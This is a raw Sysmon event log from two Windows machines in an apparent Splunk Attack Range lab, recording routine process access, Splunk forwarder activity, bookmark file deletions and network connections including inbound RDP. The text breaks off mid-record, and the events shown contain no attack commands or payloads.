10341000x8000000000000000976093Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.156{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-87F0-6151-6F79-00000000FD01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976092Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.156{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976091Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.156{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976090Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.156{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-87F0-6151-6F79-00000000FD01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976089Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.126{69CF5F33-87F0-6151-6F79-00000000FD01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976088Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:28.062{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=861A92BB4204761B61CE5AF9FA6DE115,SHA256=002F849CF650681737A480CC1F9CDCA4F6FA0D35CAAB591139AF6502AE07C05F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047578Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:29.647{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD758FC5EFB0B6C3D2248F7CD2CF5C21,SHA256=8DF9F8B40C1F5F468DED5CD7C66547824DFFD248E810831D54F071E1F8A09215,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976136Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.907{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0EB3C70B51A894AD13669C65D02E5B46,SHA256=0A6A2DCACB7AF5CE5BA2F95BBBFF27C01299278F00838725E2B1A5978B06B618,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976135Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.658{69CF5F33-87F1-6151-7179-00000000FD01}28483308C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000976134Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.658{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE0BDB74D34C095DCD6F4A86018DDE54,SHA256=AC98A38A874A7112EBF4DF9B6791F9D61692B79262B4F97176A5C2686D59218D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976133Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.508{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54719-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000976132Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.437{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-87F1-6151-7179-00000000FD01}2848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976131Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.437{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-87F1-6151-7179-00000000FD01}2848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976130Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.437{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976129Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.437{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976128Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.437{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-87F1-6151-7179-00000000FD01}2848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976127Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.437{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976126Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.437{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976125Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.437{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976124Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.437{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976123Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.437{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976122Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.437{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976121Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.437{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976120Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.423{69CF5F33-87F1-6151-7179-00000000FD01}2848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047579Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:30.667{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F240C753257261CD152717CF417CFE76,SHA256=52E32E34B3058B4C596E81276079D34D0928365949DC83276D89A79CDA181E6A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976141Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.768{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59237-false10.0.1.12-8000- 354300x8000000000000000976140Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.226{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-16663-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976139Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:30.453{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A87456DF929D5A598414D980F5049A51,SHA256=77EF132167842D8AD9DC882177B9D105BBFEBFD5BEFF1E9AE194F9C9B72278CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976138Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:30.156{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=188337D50D9E19815397EDDC1C201DBD,SHA256=A325AD0CD062781CBDCECF96F1A36662749E10FA938D49A3ED19051B336A92C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976137Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:30.156{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7BDAAC1E28D9995DAF78015B6910A8D8,SHA256=22BB2E747CF08516B1F754D84663423859C813947A339B6E9D52E3CF213CDC44,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047581Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:29.840{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49195-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047580Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:31.697{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=598E72E10C85A839759C20D36251CC70,SHA256=B18049381BB639C4C8794CB78A38BE311C238D8E49E5E23F3CAA6FF80AE98016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976142Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:31.687{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F178F6EBFC33F8D3E85403D064F021A,SHA256=AF98998B42D123B7108AE58FF6E372A081C4E5E047B3714E9348095EEE545C75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976146Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:32.906{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C64694599F570724D4CD9B910332F74E,SHA256=7CFDD8516AA4BCD99726EA122A00B1D9D108B1B27DBC24C71FBE806FBBD77902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047582Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:32.713{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED6E8BB56E665A783A4CE2E58278F771,SHA256=412F2E601834A798F1B4775291530799A6D96D08B4F0F763E0EA89D0EB0D22E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976145Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:29.738{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 